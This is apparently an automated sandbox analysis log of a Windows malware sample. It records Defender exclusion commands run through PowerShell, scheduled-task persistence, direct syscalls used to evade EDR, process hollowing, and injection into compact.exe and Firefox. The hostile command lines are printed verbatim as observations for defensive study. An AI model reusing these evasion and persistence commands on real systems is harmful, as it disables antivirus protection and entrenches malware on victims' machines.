Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123EA80 mov eax, dword ptr fs:[00000030h]	9_2_0123EA80
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123EA80 mov eax, dword ptr fs:[00000030h]	9_2_0123EA80
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123EA80 mov eax, dword ptr fs:[00000030h]	9_2_0123EA80
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123EA80 mov eax, dword ptr fs:[00000030h]	9_2_0123EA80
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0123EA80 mov eax, dword ptr fs:[00000030h]	9_2_0123EA80
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01304A80 mov eax, dword ptr fs:[00000030h]	9_2_01304A80
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01268A90 mov edx, dword ptr fs:[00000030h]	9_2_01268A90
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126AAEE mov eax, dword ptr fs:[00000030h]	9_2_0126AAEE
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0126AAEE mov eax, dword ptr fs:[00000030h]	9_2_0126AAEE
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01286ACC mov eax, dword ptr fs:[00000030h]	9_2_01286ACC
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01286ACC mov eax, dword ptr fs:[00000030h]	9_2_01286ACC
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01286ACC mov eax, dword ptr fs:[00000030h]	9_2_01286ACC
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01230AD0 mov eax, dword ptr fs:[00000030h]	9_2_01230AD0

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe

Memory allocated: page read and write | page guard

Adds a directory exclusion to Windows Defender

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P1 HWT623ATG.bat.exe"
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe"
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P1 HWT623ATG.bat.exe"	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe"	Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtWriteVirtualMemory: Direct from: 0x77762E3C
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtMapViewOfSection: Direct from: 0x77762D1C
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtNotifyChangeKey: Direct from: 0x77763C2C
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtCreateMutant: Direct from: 0x777635CC
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtResumeThread: Direct from: 0x777636AC
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtProtectVirtualMemory: Direct from: 0x77757B2E
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtQuerySystemInformation: Direct from: 0x77762DFC
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtAllocateVirtualMemory: Direct from: 0x77762BFC
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtReadFile: Direct from: 0x77762ADC
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtDelayExecution: Direct from: 0x77762DDC
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtWriteVirtualMemory: Direct from: 0x7776490C
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtQueryInformationProcess: Direct from: 0x77762C26
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtResumeThread: Direct from: 0x77762FBC
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtCreateUserProcess: Direct from: 0x7776371C
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtSetInformationThread: Direct from: 0x777563F9
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtAllocateVirtualMemory: Direct from: 0x77763C9C
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtSetInformationThread: Direct from: 0x77762B4C
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtQueryAttributesFile: Direct from: 0x77762E6C
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtReadVirtualMemory: Direct from: 0x77762E8C
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtCreateKey: Direct from: 0x77762C6C
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtQuerySystemInformation: Direct from: 0x777648CC
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtAllocateVirtualMemory: Direct from: 0x777648EC
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtQueryVolumeInformationFile: Direct from: 0x77762F2C
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtOpenSection: Direct from: 0x77762E0C
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtDeviceIoControlFile: Direct from: 0x77762AEC
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtAllocateVirtualMemory: Direct from: 0x77762BEC
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtQueryInformationToken: Direct from: 0x77762CAC
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtTerminateThread: Direct from: 0x77762FCC
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtCreateFile: Direct from: 0x77762FEC
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtOpenFile: Direct from: 0x77762DCC
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtOpenKeyEx: Direct from: 0x77762B9C
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtSetInformationProcess: Direct from: 0x77762C5C
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	NtProtectVirtualMemory: Direct from: 0x77762F9C

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Memory written: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Memory written: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe base: 400000 value starts with: 4D5A			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: NULL target: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: NULL target: C:\Windows\SysWOW64\compact.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: NULL target: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe protection: read write
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: NULL target: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\compact.exe

Thread register set: target process: 7892

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\compact.exe

Thread APC queued: target process: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Sample uses process hollowing technique

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Section unmapped: C:\Users\user\AppData\Local\Temp\Smilet.exe base address: 400000

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Users\user\AppData\Local\Temp\Smilet.exe base: 1660000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Users\user\AppData\Local\Temp\Smilet.exe base: 19FFF4

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P1 HWT623ATG.bat.exe"	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe"	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GnVIdcfKFYG" /XML "C:\Users\user\AppData\Local\Temp\tmpC293.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process created: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe "C:\Users\user\Desktop\P1 HWT623ATG.bat.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GnVIdcfKFYG" /XML "C:\Users\user\AppData\Local\Temp\tmpDBA9.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process created: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe "C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe"	Jump to behavior
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	Process created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"
Source: C:\Windows\SysWOW64\compact.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\SysWOW64\compact.exe	Process created: C:\Users\user\AppData\Local\Temp\bfc.exe "C:\Users\user~1\AppData\Local\Temp\bfc.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Smilet.exe "C:\Users\user~1\AppData\Local\Temp\Smilet.exe"

Source: hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 00000019.00000000.1502102417.0000000000CA0000.00000002.00000001.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 00000019.00000002.3718914762.0000000000CA0000.00000002.00000001.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3719369497.00000000012A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 00000019.00000000.1502102417.0000000000CA0000.00000002.00000001.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 00000019.00000002.3718914762.0000000000CA0000.00000002.00000001.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3719369497.00000000012A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 00000019.00000000.1502102417.0000000000CA0000.00000002.00000001.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 00000019.00000002.3718914762.0000000000CA0000.00000002.00000001.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3719369497.00000000012A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 00000019.00000000.1502102417.0000000000CA0000.00000002.00000001.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 00000019.00000002.3718914762.0000000000CA0000.00000002.00000001.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3719369497.00000000012A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Queries volume information: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
